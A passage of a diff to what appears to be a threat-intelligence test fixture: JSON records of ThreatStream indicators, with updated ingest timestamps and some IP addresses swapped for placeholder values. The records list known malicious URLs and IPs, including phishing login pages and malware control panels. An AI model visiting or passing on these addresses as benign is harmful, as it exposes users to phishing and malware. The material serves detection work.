"2021-12-13T05:57:34.388531834Z", + "ingested": "2021-12-13T08:38:40.025978100Z", "original": "{\"created\":\"2020-02-22T02:54:18.93Z\",\"description\":\"TS ID: 55335562502; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--e75aa726-cbb0-486f-ac25-947fc76fb5de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-22T02:54:18.93Z\",\"name\":\"mal_url: http://paperblank.best/gHL6qufBKIulnp11/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://paperblank.best/gHL6qufBKIulnp11/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:18.93Z\"}", "category": "threat", "type": "indicator", @@ -26564,7 +26564,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 8.208.3.169", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55335562470; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime", "modified": "2020-02-22T02:54:18.975Z", "valid_from": "2020-02-22T02:54:18.975Z", @@ -26586,12 +26586,12 @@ "first_seen": "2020-02-22T02:54:18.975Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "8.208.3.169" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388536072Z", - "original": "{\"created\":\"2020-02-22T02:54:18.975Z\",\"description\":\"TS ID: 55335562470; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--9f6d9425-fc79-4493-8f95-81ac2a7ae188\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-22T02:54:18.975Z\",\"name\":\"mal_ip: 8.208.3.169\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '8.208.3.169']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:18.975Z\"}", + "ingested": "2021-12-13T08:38:40.025981700Z", + "original": "{\"created\":\"2020-02-22T02:54:18.975Z\",\"description\":\"TS ID: 55335562470; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--9f6d9425-fc79-4493-8f95-81ac2a7ae188\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-22T02:54:18.975Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:18.975Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26642,7 +26642,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388540541Z", + "ingested": "2021-12-13T08:38:40.025986500Z", "original": "{\"created\":\"2020-02-22T02:54:27.432Z\",\"description\":\"TS ID: 55335562494; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--1333f7e6-3af0-4aea-b798-a54f03d68ac5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-22T02:54:27.432Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/frega2/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/frega2/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:27.432Z\"}", "category": "threat", "type": "indicator", @@ -26694,7 +26694,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388544688Z", + "ingested": "2021-12-13T08:38:40.025991100Z", "original": "{\"created\":\"2020-02-22T02:54:27.479Z\",\"description\":\"TS ID: 55335562474; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--f4e076ed-6393-49d5-adc2-cbe730ff48db\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-22T02:54:27.479Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/beta/herm/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/beta/herm/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:27.479Z\"}", "category": "threat", "type": "indicator", @@ -26746,7 +26746,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388549598Z", + "ingested": "2021-12-13T08:38:40.025995100Z", "original": "{\"created\":\"2020-02-22T02:54:29.634Z\",\"description\":\"TS ID: 55335562505; iType: mal_url; State: active; Org: ChunkHost; Source: CyberCrime\",\"id\":\"indicator--2b38be23-b226-460e-9b17-4480e930f271\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-22T02:54:29.634Z\",\"name\":\"mal_url: http://almondmilkoils.com/E6OCF8w8IPI6vxKa/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://almondmilkoils.com/E6OCF8w8IPI6vxKa/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:29.634Z\"}", "category": "threat", "type": "indicator", @@ -26798,7 +26798,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388553625Z", + "ingested": "2021-12-13T08:38:40.025999300Z", "original": "{\"created\":\"2020-02-22T02:54:29.689Z\",\"description\":\"TS ID: 55335562500; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--0bfd644c-62ef-4f03-9d1d-304673d912f1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-22T02:54:29.689Z\",\"name\":\"mal_url: http://pay-robokassa.net/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pay-robokassa.net/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:29.689Z\"}", "category": "threat", "type": "indicator", @@ -26850,7 +26850,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388558294Z", + "ingested": "2021-12-13T08:38:40.026002700Z", "original": "{\"created\":\"2020-02-22T02:54:47.42Z\",\"description\":\"TS ID: 55335562476; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--a15df968-dec6-4122-811e-1144011d0653\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:54:47.42Z\",\"name\":\"mal_url: http://nortonlilly.info/jb/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/jb/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:47.42Z\"}", "category": "threat", "type": "indicator", @@ -26869,7 +26869,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://185.70.185.34/host/admin.php", + "name": "mal_url: http://89.160.20.156/host/admin.php", "description": "TS ID: 55335562428; iType: mal_url; State: active; Org: Hostkey B.v.; Source: CyberCrime", "modified": "2020-02-22T02:54:48.824Z", "valid_from": "2020-02-22T02:54:48.824Z", @@ -26894,16 +26894,16 @@ "url": { "path": "/host/admin.php", "extension": "php", - "original": "http://185.70.185.34/host/admin.php", + "original": "http://89.160.20.156/host/admin.php", "scheme": "http", - "domain": "185.70.185.34", - "full": "http://185.70.185.34/host/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/host/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.388562462Z", - "original": "{\"created\":\"2020-02-22T02:54:48.824Z\",\"description\":\"TS ID: 55335562428; iType: mal_url; State: active; Org: Hostkey B.v.; Source: CyberCrime\",\"id\":\"indicator--11fec449-039c-4d64-aefa-210e96074633\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-40\"],\"modified\":\"2020-02-22T02:54:48.824Z\",\"name\":\"mal_url: http://185.70.185.34/host/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://185.70.185.34/host/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:48.824Z\"}", + "ingested": "2021-12-13T08:38:40.026007500Z", + "original": "{\"created\":\"2020-02-22T02:54:48.824Z\",\"description\":\"TS ID: 55335562428; iType: mal_url; State: active; Org: Hostkey B.v.; Source: CyberCrime\",\"id\":\"indicator--11fec449-039c-4d64-aefa-210e96074633\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-40\"],\"modified\":\"2020-02-22T02:54:48.824Z\",\"name\":\"mal_url: http://89.160.20.156/host/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/host/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:48.824Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26954,7 +26954,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388566730Z", + "ingested": "2021-12-13T08:38:40.026014500Z", "original": "{\"created\":\"2020-02-22T02:54:49.84Z\",\"description\":\"TS ID: 55335562466; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--5d04eb73-cda3-4f22-bcaf-604660d26343\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:54:49.84Z\",\"name\":\"mal_url: http://nortonlilly.info/ace1/st/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/ace1/st/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:49.84Z\"}", "category": "threat", "type": "indicator", @@ -26973,7 +26973,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://94.100.18.4/primfive/logs/omc.php", + "name": "mal_url: http://89.160.20.156/primfive/logs/omc.php", "description": "TS ID: 55335562498; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime", "modified": "2020-02-22T02:54:51.052Z", "valid_from": "2020-02-22T02:54:51.052Z", @@ -26998,16 +26998,16 @@ "url": { "path": "/primfive/logs/omc.php", "extension": "php", - "original": "http://94.100.18.4/primfive/logs/omc.php", + "original": "http://89.160.20.156/primfive/logs/omc.php", "scheme": "http", - "domain": "94.100.18.4", - "full": "http://94.100.18.4/primfive/logs/omc.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/primfive/logs/omc.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.388571008Z", - "original": "{\"created\":\"2020-02-22T02:54:51.052Z\",\"description\":\"TS ID: 55335562498; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime\",\"id\":\"indicator--f7bafcb3-679f-4959-8ed0-d3d8b62eceef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-22T02:54:51.052Z\",\"name\":\"mal_url: http://94.100.18.4/primfive/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://94.100.18.4/primfive/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:51.052Z\"}", + "ingested": "2021-12-13T08:38:40.026018700Z", + "original": "{\"created\":\"2020-02-22T02:54:51.052Z\",\"description\":\"TS ID: 55335562498; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime\",\"id\":\"indicator--f7bafcb3-679f-4959-8ed0-d3d8b62eceef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-22T02:54:51.052Z\",\"name\":\"mal_url: http://89.160.20.156/primfive/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/primfive/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:51.052Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27058,7 +27058,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389400114Z", + "ingested": "2021-12-13T08:38:40.026047100Z", "original": "{\"created\":\"2020-02-22T02:54:51.08Z\",\"description\":\"TS ID: 55335562469; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--4913d346-5153-40a6-b5ab-9854e91f4ac6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-22T02:54:51.08Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/gold/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/gold/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:51.08Z\"}", "category": "threat", "type": "indicator", @@ -27110,7 +27110,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389407739Z", + "ingested": "2021-12-13T08:38:40.026050900Z", "original": "{\"created\":\"2020-02-22T02:54:57.998Z\",\"description\":\"TS ID: 55335562501; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--abd1ec0d-3831-4ae8-93fd-fa22ed4d20fd\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-22T02:54:57.998Z\",\"name\":\"mal_url: http://dronius267.myjino.ru/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dronius267.myjino.ru/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:57.998Z\"}", "category": "threat", "type": "indicator", @@ -27162,7 +27162,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389412688Z", + "ingested": "2021-12-13T08:38:40.026056Z", "original": "{\"created\":\"2020-02-22T02:54:58.082Z\",\"description\":\"TS ID: 55335562493; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--21a62996-f4f5-4b77-be5d-4f84a7e7d084\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-22T02:54:58.082Z\",\"name\":\"mal_url: http://aladebtrading.com/loki/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aladebtrading.com/loki/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:58.082Z\"}", "category": "threat", "type": "indicator", @@ -27181,7 +27181,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://193.142.59.88/primsix/logs/omc.php", + "name": "mal_url: http://89.160.20.156/primsix/logs/omc.php", "description": "TS ID: 55335562496; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-02-22T02:54:59.268Z", "valid_from": "2020-02-22T02:54:59.268Z", @@ -27206,16 +27206,16 @@ "url": { "path": "/primsix/logs/omc.php", "extension": "php", - "original": "http://193.142.59.88/primsix/logs/omc.php", + "original": "http://89.160.20.156/primsix/logs/omc.php", "scheme": "http", - "domain": "193.142.59.88", - "full": "http://193.142.59.88/primsix/logs/omc.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/primsix/logs/omc.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.389417176Z", - "original": "{\"created\":\"2020-02-22T02:54:59.268Z\",\"description\":\"TS ID: 55335562496; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--7f70004c-d9ab-4f22-b3d8-511682528ccc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-22T02:54:59.268Z\",\"name\":\"mal_url: http://193.142.59.88/primsix/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://193.142.59.88/primsix/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:59.268Z\"}", + "ingested": "2021-12-13T08:38:40.026077900Z", + "original": "{\"created\":\"2020-02-22T02:54:59.268Z\",\"description\":\"TS ID: 55335562496; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--7f70004c-d9ab-4f22-b3d8-511682528ccc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-22T02:54:59.268Z\",\"name\":\"mal_url: http://89.160.20.156/primsix/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/primsix/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:59.268Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27266,7 +27266,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389530810Z", + "ingested": "2021-12-13T08:38:40.026084300Z", "original": "{\"created\":\"2020-02-22T02:54:59.71Z\",\"description\":\"TS ID: 55335562514; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--0c36d9c7-4938-49c0-9704-38aeaee90f95\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-22T02:54:59.71Z\",\"name\":\"mal_url: http://worldatdoor.in/nato/Pony/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/nato/Pony/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:59.71Z\"}", "category": "threat", "type": "indicator", @@ -27318,7 +27318,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389554945Z", + "ingested": "2021-12-13T08:38:40.026090200Z", "original": "{\"created\":\"2020-02-22T02:55:06.175Z\",\"description\":\"TS ID: 55335562464; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--af30a658-0eea-4daf-b26f-26f060e56bc9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:55:06.175Z\",\"name\":\"mal_url: http://nortonlilly.info/jp/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/jp/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:06.175Z\"}", "category": "threat", "type": "indicator", @@ -27370,7 +27370,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389561768Z", + "ingested": "2021-12-13T08:38:40.026118500Z", "original": "{\"created\":\"2020-02-22T02:55:16.703Z\",\"description\":\"TS ID: 55335562478; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--6c50747b-39c8-48c7-9fdc-86427a702ce1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-22T02:55:16.703Z\",\"name\":\"mal_url: http://worldatdoor.in/lewis1/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/lewis1/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:16.703Z\"}", "category": "threat", "type": "indicator", @@ -27421,7 +27421,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389566767Z", + "ingested": "2021-12-13T08:38:40.026122900Z", "original": "{\"created\":\"2020-02-22T02:55:26.13Z\",\"description\":\"TS ID: 55335562507; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime\",\"id\":\"indicator--a2d5be60-5ee7-4dc6-b626-f5af241f2da0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-45\"],\"modified\":\"2020-02-22T02:55:26.13Z\",\"name\":\"mal_url: http://67.215.224.144/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://67.215.224.144/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:26.13Z\"}", "category": "threat", "type": "indicator", @@ -27473,7 +27473,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389570925Z", + "ingested": "2021-12-13T08:38:40.026127400Z", "original": "{\"created\":\"2020-02-22T02:55:32.068Z\",\"description\":\"TS ID: 55335562512; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: CyberCrime\",\"id\":\"indicator--d1c9a2c5-972d-4de3-97b5-c8175e4a0c4c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-22T02:55:32.068Z\",\"name\":\"mal_url: http://abyng.com/mg/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://abyng.com/mg/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:32.068Z\"}", "category": "threat", "type": "indicator", @@ -27492,7 +27492,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 192.64.118.182", + "name": "mal_ip: 192.168.118.182", "description": "TS ID: 55335562503; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime", "modified": "2020-02-22T02:55:34.073Z", "valid_from": "2020-02-22T02:55:34.073Z", @@ -27514,12 +27514,12 @@ "first_seen": "2020-02-22T02:55:34.073Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "192.64.118.182" + "ip": "192.168.118.182" } }, "event": { - "ingested": "2021-12-13T05:57:34.389575113Z", - "original": "{\"created\":\"2020-02-22T02:55:34.073Z\",\"description\":\"TS ID: 55335562503; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--bb1eb654-4bcc-4292-a65d-879efac8ff18\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:55:34.073Z\",\"name\":\"mal_ip: 192.64.118.182\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.64.118.182']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:34.073Z\"}", + "ingested": "2021-12-13T08:38:40.026132600Z", + "original": "{\"created\":\"2020-02-22T02:55:34.073Z\",\"description\":\"TS ID: 55335562503; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--bb1eb654-4bcc-4292-a65d-879efac8ff18\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:55:34.073Z\",\"name\":\"mal_ip: 192.168.118.182\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.168.118.182']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:34.073Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27537,7 +27537,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 185.141.24.100", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55335562427; iType: mal_ip; State: active; Org: Host Sailor Ltd.; Source: CyberCrime", "modified": "2020-02-22T02:55:37.882Z", "valid_from": "2020-02-22T02:55:37.882Z", @@ -27559,12 +27559,12 @@ "first_seen": "2020-02-22T02:55:37.882Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "185.141.24.100" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.389578910Z", - "original": "{\"created\":\"2020-02-22T02:55:37.882Z\",\"description\":\"TS ID: 55335562427; iType: mal_ip; State: active; Org: Host Sailor Ltd.; Source: CyberCrime\",\"id\":\"indicator--fdcefce4-18b5-4a39-9b8d-a8816fe4c411\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-22T02:55:37.882Z\",\"name\":\"mal_ip: 185.141.24.100\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '185.141.24.100']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:37.882Z\"}", + "ingested": "2021-12-13T08:38:40.026136700Z", + "original": "{\"created\":\"2020-02-22T02:55:37.882Z\",\"description\":\"TS ID: 55335562427; iType: mal_ip; State: active; Org: Host Sailor Ltd.; Source: CyberCrime\",\"id\":\"indicator--fdcefce4-18b5-4a39-9b8d-a8816fe4c411\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-22T02:55:37.882Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:37.882Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27615,7 +27615,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389582958Z", + "ingested": "2021-12-13T08:38:40.026142600Z", "original": "{\"created\":\"2020-02-22T02:55:50.468Z\",\"description\":\"TS ID: 55335562509; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--8358dddf-0d73-48e3-b8cd-14dc1ba01c09\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-22T02:55:50.468Z\",\"name\":\"mal_url: http://d0lphin1337.xyz/autofarm/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://d0lphin1337.xyz/autofarm/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:50.468Z\"}", "category": "threat", "type": "indicator", @@ -27667,7 +27667,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389586664Z", + "ingested": "2021-12-13T08:38:40.026164900Z", "original": "{\"created\":\"2020-02-22T02:55:52.759Z\",\"description\":\"TS ID: 55335562480; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--f1deba70-4cd9-42a2-877f-9036b38c72b4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-22T02:55:52.759Z\",\"name\":\"mal_url: http://worldatdoor.in/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:52.759Z\"}", "category": "threat", "type": "indicator", @@ -27686,7 +27686,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://94.100.18.11/plugman/logs/omc.php", + "name": "mal_url: http://89.160.20.156/plugman/logs/omc.php", "description": "TS ID: 55342497317; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime", "modified": "2020-02-23T02:51:55.106Z", "valid_from": "2020-02-23T02:51:55.106Z", @@ -27711,16 +27711,16 @@ "url": { "path": "/plugman/logs/omc.php", "extension": "php", - "original": "http://94.100.18.11/plugman/logs/omc.php", + "original": "http://89.160.20.156/plugman/logs/omc.php", "scheme": "http", - "domain": "94.100.18.11", - "full": "http://94.100.18.11/plugman/logs/omc.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/plugman/logs/omc.php" } } }, "event": { 